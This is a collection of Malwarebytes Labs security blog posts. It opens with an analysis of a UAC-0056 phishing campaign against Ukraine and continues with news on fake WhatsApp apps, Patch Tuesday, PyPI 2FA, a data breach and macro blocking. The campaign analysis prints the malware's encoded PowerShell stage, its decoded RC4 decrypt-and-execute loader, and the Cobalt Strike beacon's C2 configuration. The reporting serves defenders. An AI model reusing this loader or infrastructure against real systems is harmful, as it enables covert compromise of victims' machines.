While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.
The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

_This blog was authored by Roberto Santos and Hossein Jazi_

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

**Different themes, same techniques**

Since the publication of our blog post _There’s a Go Elephant in the room_, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

Let’s dig further into those relationships. UA-CERT has attributed the document named “_Information on the availability of **vacancies** and their staffing.xls_” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (_**Humanitarian catastrophe** of Ukraine since February 24, 2022.xls_) we see an almost identical macro to the one used in another decoy document called _Help Ukraine.xls_:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The **Help Ukraine** lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found comments regarding to a domain named ExcelVBA\[.\]ru. This document was contacting a suspiciously similar domain named excel-vba\[.\]ru.

Figure 6: Similarities between different versions (2)

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

> _On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine_!
> 
> Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (_Information on the availability of vacancies and their staffing.xls_). The analysis is still valid for the others, while minor changes exist between samples.

**write.bin**

The document will download an executable file named _write.bin_. Other attacks following the same scheme used different names for this file, including _Office.exe_, _baseupd.exe_ and _DataSource.exe_. The file is slightly obfuscated, and performs the following actions:

**Establishing persistence**

After some antidebug tricks, the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, is checked first because that was the key used by previous versions of the malware.

Figure 7: Run key for persistence

**Dropping next stage**

Next step is dropping a file in _C:\\ProgramData\\TRYxaEbX_.  This file will be used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

Figure 9: Write executable creating the previous detailed powershell command

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in _C:\ProgramData\TRYxaEbX_ will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

*   Disable script logging
*   Disable Module Logging
*   Disable Transcription
*   Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

**Cobalt Strike payload deployed**

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

**BeaconType**                    – HTTPS

**Port**                              – 443

**SleepTime**                       – 30000

**PublicKey\_MD5**              – defb5d95ce99e1ebbf421a1a38d9cb64

**C2Server**                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

**UserAgent**                       – Mozilla/5.0\_Frsg\_stredf\_o21\_rutyyyrui\_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko\_10984gap

**HttpPostUri**                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

**Watermark**                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

**Attacker probes the sandbox**

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

**Attribution to UAC-0056**

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

**IOCs**

**Malicious Excel documents (Help Ukraine template)**

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3  
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a  
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532  
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0  
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386  
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff  
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

**Malicious Excel documents (Humanitarian template)**

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1  
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea  
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

**Payloads**

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470  
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a  
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346  
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

**Cobalt Strike beacon and payloads**

136.144.41\[.\]177  
syriahr\[.\]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/  
syriahr\[.\]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/  
skreatortemp\[.\]site  
imolaoggi\[.\]eu

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

We take a look at warnings of malware-infested WhatsApp downloads offered outside of the Google Play store.
The post WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info appeared first on Malwarebytes Labs.

WhatsApp boss Will Cathcart is warning users of the popular messaging app to be on their guard after the WhatsApp Security Team discovered bogus apps packing a hidden punch in the form of malware.

**Outside the safety of the walled garden**

App stores do whatever they can to try and prevent bogus programs making it onto the storefront. While the majority of apps on legitimate stores are likely safe, rogues do get through. To avoid the hassle of dodging safety checks, malware authors host their infected files elsewhere. If they can draw device owners outside the relative safety of a storefront, they have more scope for infecting a mobile.

Sure enough:

> Recently our security team discovered hidden malware within apps – offered outside of Google Play – from a developer called “HeyMods” that included "Hey WhatsApp" and others.
> 
> — Will Cathcart (@wcathcart) July 11, 2022

There’s no detailed rundown of what the fake WhatsApp versions were getting up to on devices. What Cathcart does say is that these programs promised new features, but were specifically designed to steal personal information stored on victim’s phones.

Google Play Protect on Android now detects and disables previously downloaded versions of the fake WhatsApp apps, and the Google Play store shouldn’t experience any threat from these apps.

This is great news for those inside the walled garden, but what about those sitting outside?

**(Un)official store safety**

Depending on which version of Android you run, your settings and options available likely differ from model to model. However, in settings there’s usually an option which asks if you wish to download or install files from unknown sources.

What this means is “Do you want to install apps from outside the Google Play store”. This isn’t quite as nefarious as it sounds. Mobile networks and other organisations often offer downloadable software as part of their phone contracts. However, these app downloads may be offered outside of the Play Store. This is where the unknown source option comes into play.

A lot of the time, downloading these files outside of the store isn’t needed. The apps offered directly from organisations can be found on the Play Store anyway, in identical format. So it’s best to only download apps from the Play Store if at all possible.

**WhatsApp: accept no imitations**

WhatsApp recommends you only download the app from official stores. You can find links for both Android and iPhone on the official download page. WhatsApp has been known to hand users temporary bans if it finds evidence of people using unsupported versions on their devices. If you’re using a listed unsupported app, which is an altered version of the original, you’ll receive a temporary ban for that too.

It seems that the safest and most straightforward course of action is to avoid unofficial downloads, and follow WhatsApp’s advice for responsible app use.

WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info

July's Patch Tuesday gives us a lot of important security updates. Most prominently, a known to be exploited vulnerability in Windows CSRSS.
The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

It’s time to triage a lot of patching again. Microsoft’s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of known to be exploited in the wild list that are due for patching by August 2, 2022.

**Microsoft**

In total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as “Critical” since they are remote code execution (RCE) vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:

CVE-2022-22029: Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.

CVE-2022-22039: Another Windows Network File System (NFS) RCE vulnerability. It’s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.

CVE-2022-22038: Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.

CVE-2022-30221: Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim’s system in the context of the targeted user.

**Azure Site Recovery**

A huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. Azure Site Recovery is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.

According to Microsoft, SQL injection vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.

**CVE-2022-22047**

The vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

The vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system’s operation and is mainly responsible for Win32 console handling and GUI shutdown.

This type of vulnerability are often chained together with others in macros, which makes the decision to roll back Office Macro blocking incomprehensible, even if it is only temporary.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

Adobe released security updates for Acrobat, Character Animator, Photoshop,  Reader, and RoboHelp.

Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates.

Citrix released hotfixes to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.

Google released Android’s July security updates including 3 labelled as “Critical”.

SAP released its July 2022 Patch Day bulletin with 20 new Security Notes.

VMWare released security updates.

Stay safe, everyone!

Update now—July Patch Tuesday patches include fix for exploited zero-day

We take a look at an incredible scam which involves an entire village faking cricket matches for an online betting ring.
The post Fake streamed cricket matches knocks victims for six appeared first on Malwarebytes Labs.

An incredible scam which resembles hidden camera prank shows has been shut down by police. Four men were arrested last week in connection with the con-job involving fake cricket and online betting. It begins in Russia, takes a trip to India, and ends up back in Russia. Here’s how it unfolded:

**Setting the stage**

People living in India who are interested in betting on sports tend to gravitate online. One of the men allegedly involved in this scam had previously worked in a bar in Russia. He’d convinced his contacts there to show interest in cricket betting, which turned out to be the starting point for all of the below.

Our intrepid bar worker returned to India, and what followed is an amazing exercise in online deception, offline activities, fictional visions of reality, and at least 20 people playing roles day in and day out.

Before we get to the real world shenanigans, let’s take a look at the YouTube angle.

**The YouTube cricket carnival**

The fake cricket matches were all hooked to one Youtube channel called Century Hitters T20. At time of writing, the channel is still live and we suspect it’ll be kept that way while investigations proceed. It’s racked up 809 subscribers with 49k views across 47 videos since it was created roughly a month ago.

It’s not possible to embed any of the streams, because the account creators have disabled that feature. Apart from the absolutely awful cricket pitch, a lot of effort has gone into lighting, visuals, camera equipment, screen graphics, even the various cricket team outfits. This leads us neatly on to the real-world component of this large scale fake out.

**Fake it till you make it**

This isn’t some small time operation with a fake office in a basement somewhere. The people behind this thought big and stuck to their goal. A _small village_ was used as the staging area for the scam. According to reports, “nearly two dozen locals” were paid to act as cricket teams, umpires, and organisers. One person even imitated a well-known cricket commentator.

Players were paid $5 per game. Fake umpires used walkie-talkies to talk to organisers, and directed the shape of each supposed cricket match. The organisers would converse with people making bets via Telegram.

To simulate the roar of the cricket-loving crowds, running commentaries complete with cheering were piped through speakers close to the cricket ground. And by cricket ground, I mean “muddy mess with a bit of grass poking up through the soil”.

> Here it is, the moment you’ve all been waiting for….
> 
> Footage of the Fake IPL, which somehow conned people in Russia into betting on it.
> 
> ‘Chennai Fighters’ off to a solid start, pitch looking in good condition. pic.twitter.com/XtaL5W5zli
> 
> — Jordan Elgott (@JElgott) July 11, 2022

They presumably picked their Russian marks well. Nobody even vaguely familiar with professional cricket would believe that real players would grace that monstrosity with their presence. There’s no mention of losses incurred by those the scammers preyed on. For now all we can do is wait and watch how this one plays out in court. Hopefully with fewer fake crowd recordings.

Fake streamed cricket matches knocks victims for six

PyPI is rolling out a 2FA requirement for maintainers of critical projects. 
The post PyPI starts rolling out required 2FA for important projects appeared first on Malwarebytes Labs.

The Python Package Index (PyPI) says it has begun rolling out a two-factor authentication (2FA) requirement which enforces maintainers of critical projects to have 2FA enabled to publish, update, or modify them. PyPI plays an important role in the Python developers’ ecosystem.

**Python repository**

PyPi is _the_ repository of software for the Python programming language. Python is a high-level, interpreted, general-purpose programming language. And it is a very popular language often used on servers to create web applications.

Many web developers, and others, use Python packages or add-on libraries from other developers as building blocks to develop their own projects. The Python Software Foundation (PSF) manages the PyPI repository where Python developers can get third-party developed open-source packages for their projects.

**Critical projects**

The projects rated as critical by the PSF are those that are in the top 1% of downloads. Maintainers of such projects should have received an email about the new requirement. The requirement will go into effect in the coming months. Based on the 1% rule, over 3,500 projects have received the critical designation.

The good news is that every project has the option to set 2FA as required. And, to ensure that maintainers of critical projects have the ability to implement strong 2FA with security keys, the Google Open Source Security Team has provided a limited number of security keys to distribute among critical project maintainers.

**The reason**

As you can imagine, unauthorized access to a project that many other depend on opens up the possibilities of a software supply chain attack. So, introducing the 2FA factor for critical projects decreases the possibility that someone might introduce malicious code into a popular project.

We have all seen the problems with Log4j. For those that missed it, Log4j is an open source logging library written in Java developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular, so the potential reach of this problem turned out to be enormous.

A similar problem that remains unresolved by these new requirements is the use of packages which are purposedly named after popular projects to confuse users into downloading a malicious version.

**Mixed feelings**

As you would expect on Twitter, there are some mixed feelings among those impacted by this new requirement. Ranging from developers saying goodbye to their popular project to those wondering why 2FA wasn’t already mandatory in the first place.

For all those with unanswered questions, PyPI has put up a FAQ about the 2FA implementation, along with the key giveaway.

PyPI starts rolling out required 2FA for important projects

Popular comics site Mangatoon has been breached due to a poorly secured database.
The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.

The hugely popular Manga comics platform Mangatoon has fallen victim to a data breach. No fewer than 23 million user accounts could be at risk, thanks to a poorly secured database. Worse still, Mangatoon doesn’t seem to be responding to messages from the breacher, or people notifying it that the breach has taken place.

**A limited edition run of exposed accounts**

Mangatoon allows comics fans to read a variety of web comics for free via the app, with the option to “unlock” whole comics for a fee. Unfortunately for Mangatoon, its Elasticsearch database was compromised leading to several attempts to get its attention.

> Anyone got a security contact at @MangatoonEN? DMs are closed and apparently they haven't been responding to emails attempting to reach them.
> 
> — Troy Hunt (@troyhunt) July 4, 2022

No response was forthcoming by email or even social media. While it’s possible everyone involved is too busy fixing the problem, the complete lack of a reply is concerning.

**Checking for exposure**

The breach data, which occurred in May, has been loaded into popular breach checking service Have I been pwned.

You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.

> New breach: Mangatoon had 23M accounts breached in May. The breach exposed names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes. 27% were already in @haveibeenpwned https://t.co/LGaAniKeSA
> 
> — Have I Been Pwned (@haveibeenpwned) July 6, 2022

**Password disasters of our time**

The 23 million or so accounts have been exposed purely because of bad password management. All of this data was, incredibly, sitting behind the “password”.

Mangatoon changed the password after the system breacher notified it. However, no customers have been notified and anyone unaware would think everything is currently business as usual. The truth is that things couldn’t be further from the case. Are there other, similarly poorly secured databases? Has the password been changed to something that isn’t “password123”?

Elasticsearch makes use of a variety of security features for all manner of configurations, so will Mangatoon be making use of these in future?

So many unanswered questions in a situation such as this isn’t massively reassuring.

**Lock down your databases**

Poorly secured Elasticsearch databases are juicy targets for those up to no good. At least 450 ransom notes were discovered demanding payment in return for files found on Elasticsearch databases back in June of this year. Sadly for anyone paying up to recover the stolen files, there’s a good chance the attackers had already deleted them. This is, of course, a valuable reminder to back up your data.

This is especially true considering Elasticsearch sits alongside both Redis and MongoDB as some of 2022’s top exposed databases.

If you use Mangatoon you should change your password to your account now. If you’ve used the same username and password combination on other accounts, you should change those too.

Insecure password leads to Mangatoon data breach

The most important and interesting computer security stories from the last week.
The post A week in security (July 4 – July 10) appeared first on Malwarebytes Labs.

*   Partner Success Story
*   Marek Drummond
    
    Managing Director at Optimus Systems
    
    "Thanks to the Malwarebytes MSP program, we have this high-quality product in our stack. It’s a great addition, and I have confidence that customers’ systems are protected."
    
*   See full story

A week in security (July 4 – July 10)

The EU is warning Meta that it needs to make big changes to the way it handles data transfers between the Europe and US.
The post Europe threatens to ban Facebook over data transfers to the US appeared first on Malwarebytes Labs.

If regulators have their way, data transfers from Facebook and Instagram between Europe and the United States could stop this summer. (WhatsApp, another Meta service, will not be affected by the decision as it has a different data controller within Meta.) This could force Meta, Facebook’s parent company, to undergo some radical changes with the way it handles data from Europe, such as setting up local data centers. Otherwise, it will have no choice but to pull out of Europe.

The Irish Data Protection Commission (DPD) sent a draft of its final decision on Thursday to its European counterparts regarding banning Meta from receiving user data from Europe.

A Meta spokesperson told the Telegraph, “This draft decision, which is subject to review by European Data Protection Authorities, relates to a conflict of EU and US law which is in the process of being resolved.”

“We welcome the EU-US agreement for a new legal framework that will allow the continued transfer of data across borders, and we expect this framework will allow us to keep families, communities and economies connected.”

Ireland is the country overseeing Facebook’s data practices as it is Facebook’s legal headquarters in Europe. Any ruling in Ireland would apply to all of Europe.

In 2020, the Court of Justice of the European Union (CJEU) repealed the EU-US Privacy Shield, a legal framework regulating the transatlantic transfer of European data to the US, calling it invalid as it failed to keep European personal data from being excluded from US surveillance. This event is commonly known as the Schrems II case.

However, data from the EU to the US continue to flow. While the CJEU annulled Privacy Shield, it also confirmed the legitimatimacy of the Standard Contractual Clauses (“SCCs”), which Facebook (and other US businesses) used as an alternative to lawfully transfer data from the EU to the US. Should the regulators’ decision become final, Meta will be forced to stop relying on the SCC as well.

“Suspending data transfers would be damaging not only to the millions of people, charities and businesses in the EU who use our services, but also to thousands of other companies who rely on EU-US data transfers to provide a global service,” a Meta spokesperson told SiliconRepublic.com. “A long-term solution on EU-US data transfers is needed to keep people, businesses and economies connected.”

In an interview with The Telegraph, Max Schrems, the privacy campaigner responsible for Privacy Shield getting binned, expected Facebook to use the Irish legal system to delay the implementation of the data transfer ban. He also added that Irish police would need to “physically cut the cords before these transfers actually stop”.

Europe threatens to ban Facebook over data transfers to the US

We waited three decades for macro blocking...and now it's going away again!
The post Microsoft appears to be rolling back Office Macro blocking appeared first on Malwarebytes Labs.

We’re seeing several reports indicating that Microsoft may have rolled back its decision to block Macros in Office. Currently no official statement exists—the reports rely on a post by a Microsoft employee in the replies of the original article where the plan to block macros was announced.

Earlier this year, Microsoft decided to disable macros downloaded from the Internet in five Office apps, by default. Users trying to open files downloaded from the Internet that contained macros would see a message, with a link to an article explaining the block.

> SECURITY RISK: Microsoft has blocked macros from running because the source of this file is untrusted

Malicious macros have been popular with criminals for more than three decades, and the step was welcomed by the security community. However, some users of Microsoft products have queried a surprising change. Dangerous files downloaded from the internet are _not_ being treated as expected in Office.

**The shifting sands of macro blocking**

Bizarrely, we’ve only experienced a few months of no macro worries as people discover the currently changing situation. A recent comment on the article describing the block mentioned that macro blocking has now been removed in Office Current Channel:

> Is it just me or have Microsoft rolled this change back on the Current Channel?
> 
> I was trying to reproduce the pinkish-red ‘Security Risk… Learn More’ notification in the Message Bar, in preparation for demonstrating the new default behaviour for a YouTube video I’m putting together about my company’s macro-enabled toolkit.
> 
> Created a simple .xlsm to show a MsgBox in the open event of the workbook, saved it and uploaded it to cloud storage, deleted it from my local storage, re-downloaded it from cloud storage (to a non-trusted location, my Downloads library)… did not use the Unblock checkbox on the Properties dialog to remove the mark of the web… then opened up the file.
> 
> It first went into Protected View (expected behaviour), but then after I clicked Enable Editing, instead of getting the pink/red message about macros being blocked altogether, I just got the old ‘Security warning…’ message with the ‘Enable Content’ button. The file’s VBA project wasn’t digitally signed, wasn’t saved to a Trusted Location, and still had the mark of the web on it… so macros should have been blocked.

A response came from someone called Angela Robertson, billed as “A Microsoft employee on the Microsoft Tech Community”:

> Based on feedback received, a rollback has started. An update about the rollback is in progress. I apologize for any inconvenience of the rollback starting before the update about the change was made available.

**Waiting for more information**

At the time of writing, we can’t say what this community feedback is or why it’s been so influential in triggering the apparent decision to disable macro blocking. The response in security circles is somewhat less than enthusiastic, and there’s no new information outside of waiting to see what’s contained in the promised “update”.

Indeed, all we have currently is a second Microsoft post which confirms the rollback:

> …based on feedback, we’re rolling back this change from Current Channel production. We appreciate the feedback we’ve received so far, and we’re working to make improvements in this experience. We’ll provide another update when we’re ready to release again to Current Channel. Thank you.

We will update this article as soon as Microsoft clarifies what exactly is going on.

Microsoft appears to be rolling back Office Macro blocking

A Youtuber has hacked into the CCTV cameras of an office used by tech support scammers and recorded them being arrested by the police.
The post Tech support scammers caught by their own cameras appeared first on Malwarebytes Labs.

A Youtuber has hacked into the CCTV cameras of an office used by tech support scammers and reported them to the police. The video feed of what is going on in that office ends with the arrest of the scammers.

**CCTV**

The Youtuber, acting under the handle Scambaiter, turned his attention to Punjab in India to spy on a group of Tech Support scammers.

“Scambaiting” means scamming the scammers, often by pretending to take their bait and wasting their time. The reasoning is that while the scammer is busy trying to reel the scambaiter in, they don’t have time to victimize someone else. Which makes it doing a good deed while having some fun.

Scambaiter, goes a little further than simply wasting scammers’ time. He has amassed almost 1.5 million YouTube followers by “hacking back” against the scammers and exposing where and how they work—in this case by using the scammers’ own CCTV cameras against them.

Scambaiter also hacked into some of the systems the scammers were using to defraud US citizens out of thousands of dollars. So, besides footage of the scammers, his hack also included taking screenshots from the laptops that the scammers were using while “at work”.

One thing that jumps out is that this is a very small and badly secured organization. Which came in handy because it enabled Scambaiter to show us several sides of the operation.

**The video**

Scambaiter condensed a weeks’ worth of footage into a 20 minute clip. In the beginning we see the scammers at work, posing as Best Buy’s Geek Squad tech support employees.

We get a good look at how these scammers are organized and how they operate. If you didn’t know they were talking people out of their money for non-existent services, it would look like any other, legitimate, office.

During the video Scambaiter explains how he found information about the scammers and their physical location, until he had gathered enough evidence to convince the local police to spring into action.

At the end of the CCTV footage you can see the police officers enter the building, shut down the electricity on two floors, and arrest five of the main scammers.

Scambaiter then concludes the video with a police report stating the charges against the scammers, and a selection of the media coverage about the incident.

**Follow the rules**

In case you want to take part in the fun the past we have posted a guide to get back at spammers safely.

Even though the video by Scambaiter has a happy end, it is important to understand that what Scambaiter did is just as illegal as the Tech Support scammers’ activity. Hacking into computer systems is illegal unless you are equipped with permission (say, the terms of a bug bounty) or a warrant, even if the victims are criminals and the hacking is in a good cause.

Stay safe, everyone!